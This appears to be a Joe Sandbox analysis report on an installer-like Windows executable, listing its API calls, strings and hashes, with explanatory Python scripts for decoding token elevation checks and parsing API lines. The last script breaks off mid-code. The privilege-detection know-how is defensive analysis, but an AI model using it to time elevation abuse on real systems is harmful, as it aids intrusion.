                                                                                            • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                            Strings
                                                                                            • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                            • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                            • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                            • API String ID: 1452528299-1392080489
                                                                                            • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                            • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                            • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                            • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                            • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                            • String ID:
                                                                                            • API String ID: 4283692357-0
                                                                                            • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                            • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                            • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CountSleepTick
                                                                                            • String ID:
                                                                                            • API String ID: 2227064392-0
                                                                                            • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                            • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                            • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                            • GetTokenInformation.ADVAPI32(00000008,00000012(TokenElevationType),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                            • CloseHandle.KERNEL32(00000000,00000008,TokenElevationType,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                            • String ID:
                                                                                            • API String ID: 215268677-0
                                                                                            • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                            • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                            • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
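The chain above (GetCurrentProcess, OpenProcessToken with TOKEN_QUERY = 0x8, GetTokenInformation, CloseHandle) is how a process learns whether it is running elevated before deciding to relaunch itself with higher privileges. The class value 0x12 passed at 0x478235 is TokenElevationType in winnt.h (TokenIntegrityLevel is 0x19), which also matches the 4-byte buffer the call supplies. The script below is an added example, not code from the sample or the report: on Windows it repeats the same four-call chain through ctypes and additionally asks for TokenIntegrityLevel; the SID and label decoders are pure Python so the result format can be checked offline on a constructed buffer. The helper names, the constructed SAMPLE_LABEL buffer and the ptr_size parameter are this example's own choices.

```python
"""Reproduce the token query at 0x478235 and decode what it returns (added example)."""
import ctypes
import struct
import sys

TOKEN_QUERY = 0x0008
TOKEN_ELEVATION_TYPE = 18    # winnt.h TOKEN_INFORMATION_CLASS value; 0x12 in the report
TOKEN_INTEGRITY_LEVEL = 25   # 0x19

ELEVATION_NAMES = {1: "TokenElevationTypeDefault",  # no split token (UAC off or built-in Administrator)
                   2: "TokenElevationTypeFull",     # running elevated, a linked limited token exists
                   3: "TokenElevationTypeLimited"}  # filtered admin token; elevation is possible

# Mandatory-label RIDs, i.e. the last sub-authority of an S-1-16-<rid> SID.
INTEGRITY_RIDS = [(0x0000, "Untrusted"), (0x1000, "Low"), (0x2000, "Medium"),
                  (0x2100, "MediumPlus"), (0x3000, "High"), (0x4000, "System"),
                  (0x5000, "ProtectedProcess")]


def elevation_name(value: int) -> str:
    return ELEVATION_NAMES.get(value, "unknown(%d)" % value)


def parse_sid(buf: bytes) -> str:
    """Decode a raw SID: revision, sub-authority count, 48-bit big-endian authority, LE sub-authorities."""
    if len(buf) < 8:
        raise ValueError("SID too short")
    revision, count = buf[0], buf[1]
    if revision != 1 or count > 15 or len(buf) < 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(buf[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def integrity_name(rid: int) -> str:
    """Windows compares labels numerically, so take the highest named level <= rid."""
    name = "Untrusted"
    for level, level_name in INTEGRITY_RIDS:
        if rid >= level:
            name = level_name
    return name


def integrity_from_label(buf: bytes, ptr_size: int = ctypes.sizeof(ctypes.c_void_p)) -> str:
    """Decode a TOKEN_MANDATORY_LABEL buffer: a SID_AND_ATTRIBUTES header {PSID, DWORD},
    padded to 2*ptr_size bytes, followed by the SID the pointer refers to."""
    sid = parse_sid(buf[2 * ptr_size:])
    parts = sid.split("-")
    if parts[2] != "16":     # SECURITY_MANDATORY_LABEL_AUTHORITY
        raise ValueError("not a mandatory-label SID: " + sid)
    return integrity_name(int(parts[-1]))


# Constructed test buffer (64-bit layout): zeroed header, then the SID S-1-16-12288 (High).
SAMPLE_LABEL = bytes(16) + bytes([1, 1, 0, 0, 0, 0, 0, 16]) + (0x3000).to_bytes(4, "little")


def query_current_token():
    """Run the report's API chain on the live process; returns None when not on Windows."""
    if sys.platform != "win32":
        return None
    k32, adv = ctypes.windll.kernel32, ctypes.windll.advapi32
    k32.GetCurrentProcess.restype = ctypes.c_void_p
    token = ctypes.c_void_p()
    if not adv.OpenProcessToken(k32.GetCurrentProcess(), TOKEN_QUERY, ctypes.byref(token)):
        raise ctypes.WinError()
    try:
        elev, needed = ctypes.c_ulong(), ctypes.c_ulong()
        if not adv.GetTokenInformation(token, TOKEN_ELEVATION_TYPE, ctypes.byref(elev), 4, ctypes.byref(needed)):
            raise ctypes.WinError()
        # TOKEN_MANDATORY_LABEL is variable-length: the first call only learns the size.
        adv.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, None, 0, ctypes.byref(needed))
        label = ctypes.create_string_buffer(needed.value)
        if not adv.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, label, needed.value, ctypes.byref(needed)):
            raise ctypes.WinError()
        return elevation_name(elev.value), integrity_from_label(label.raw)
    finally:
        k32.CloseHandle(token)


if __name__ == "__main__":
    live = query_current_token()
    print("live token:", live if live else "n/a (not Windows)")
    print("constructed label decodes to:", integrity_from_label(SAMPLE_LABEL, ptr_size=8))
```

A TokenElevationTypeLimited result is the case an installer acts on: the process holds a filtered token and can obtain a full one by relaunching with the "runas" verb, which is the behaviour the report summarises as launching a program with higher privileges.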
                                                                                            APIs
                                                                                            • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                            • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                            • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                            • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                            • String ID:
                                                                                            • API String ID: 2280970139-0
                                                                                            • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                            • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                            • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                            APIs
                                                                                            • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                            • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocHandleLockUnlock
                                                                                            • String ID:
                                                                                            • API String ID: 2167344118-0
                                                                                            • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                            • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                            • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                            APIs
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                            Strings
                                                                                            • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                            • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                            • API String ID: 3535843008-1938159461
                                                                                            • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                            • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                            • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                            APIs
                                                                                            • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                            • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                            Strings
                                                                                            • Will not restart Windows automatically., xrefs: 004836F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ActiveForeground
                                                                                            • String ID: Will not restart Windows automatically.
                                                                                            • API String ID: 307657957-4169339592
                                                                                            • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                            • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                            • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                            APIs
                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                            • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                            Strings
                                                                                            • Extracting temporary file: , xrefs: 004763EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileTime$Local
                                                                                            • String ID: Extracting temporary file:
                                                                                            • API String ID: 791338737-4171118009
                                                                                            • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                            • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                            • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                            Strings
                                                                                            • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                            • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                            • API String ID: 0-1974262853
                                                                                            • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                            • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                            • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                            APIs
                                                                                              • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                            • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                            Strings
                                                                                            • %s\%s_is1, xrefs: 00478F10
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                            • API String ID: 47109696-1598650737
                                                                                            • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                            • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                            • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
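Every "APIs" block in this report prints calls in one fixed shape, `Api.MODULE(arg,arg,...), ref: ADDRESS`, with arguments as 8-digit hex words, literal strings, or `?` when the sandbox could not recover a value, and the stack dump continues past the real parameters. Reading it by eye means repeatedly translating the same constants: `80000002` for HKEY_LOCAL_MACHINE in the RegOpenKeyExA subcall above, `00000008` for TOKEN_QUERY and `00000012` for TokenElevationType in the token block earlier, `00000001` for SW_SHOWNORMAL in the ShellExecuteA block. The parser below is an added example written for this page, not a Joe Sandbox tool: it converts such lines into records and resolves the hex arguments whose meaning is fixed by the API prototype. The decoder table, the record layout and the constructed SAMPLE text (five lines copied from the blocks above) are this example's own choices; it covers only the APIs shown here and splits arguments on commas, so a string argument containing a comma would need a smarter tokenizer.

```python
"""Parse Joe Sandbox "APIs" lines into decoded call records (added example)."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

# Constructed sample input: five "APIs" lines copied from the report blocks above.
SAMPLE = r"""
• GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenElevationType),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
"""

LINE_RE = re.compile(r"^\s*•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]{1,8})\s*$")
HEX_RE = re.compile(r"^([0-9A-Fa-f]{8})(?:\(\w+\))?$")   # 8 hex digits, optional "(Label)" annotation


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]   # raw tokens as printed; "?" means the sandbox could not recover the value
    ref: int          # call-site address


def parse_block(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # headings such as "APIs" or "Strings" are skipped
        api, module, raw_args, ref = m.groups()
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(api, module, args, int(ref, 16)))
    return calls


# Constant tables from winreg.h / winnt.h / winuser.h, limited to what the blocks above use.
HIVES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS", 0x80000005: "HKEY_CURRENT_CONFIG"}
TOKEN_INFO_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges", 8: "TokenType",
                    12: "TokenSessionId", 18: "TokenElevationType", 19: "TokenLinkedToken",
                    20: "TokenElevation", 25: "TokenIntegrityLevel"}
TOKEN_ACCESS = {0x0001: "TOKEN_ASSIGN_PRIMARY", 0x0002: "TOKEN_DUPLICATE", 0x0004: "TOKEN_IMPERSONATE",
                0x0008: "TOKEN_QUERY", 0x0010: "TOKEN_QUERY_SOURCE", 0x0020: "TOKEN_ADJUST_PRIVILEGES",
                0x0040: "TOKEN_ADJUST_GROUPS", 0x0080: "TOKEN_ADJUST_DEFAULT", 0x0100: "TOKEN_ADJUST_SESSIONID"}
REG_SAM = {0x0001: "KEY_QUERY_VALUE", 0x0002: "KEY_SET_VALUE", 0x0004: "KEY_CREATE_SUB_KEY",
           0x0008: "KEY_ENUMERATE_SUB_KEYS", 0x0010: "KEY_NOTIFY", 0x0020: "KEY_CREATE_LINK",
           0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY", 0x20000: "READ_CONTROL"}
SHOW_CMD = {0: "SW_HIDE", 1: "SW_SHOWNORMAL", 2: "SW_SHOWMINIMIZED", 3: "SW_SHOWMAXIMIZED",
            5: "SW_SHOW", 6: "SW_MINIMIZE", 7: "SW_SHOWMINNOACTIVE"}


def _enum(table: Dict[int, str]) -> Callable[[int], str]:
    return lambda v: table.get(v, "0x%08X" % v)


def _flags(table: Dict[int, str]) -> Callable[[int], str]:
    def decode(v: int) -> str:
        names = [name for bit, name in table.items() if v & bit == bit]
        rest = v
        for bit in table:
            if v & bit == bit:
                rest &= ~bit
        if rest:
            names.append("0x%X" % rest)   # bits the table does not know
        return "|".join(names) if names else "0"
    return decode


# (API, zero-based parameter index) -> decoder; indices follow the documented prototypes.
DECODERS: Dict[Tuple[str, int], Callable[[int], str]] = {
    ("OpenProcessToken", 1): _flags(TOKEN_ACCESS),       # DesiredAccess
    ("GetTokenInformation", 1): _enum(TOKEN_INFO_CLASS),  # TokenInformationClass
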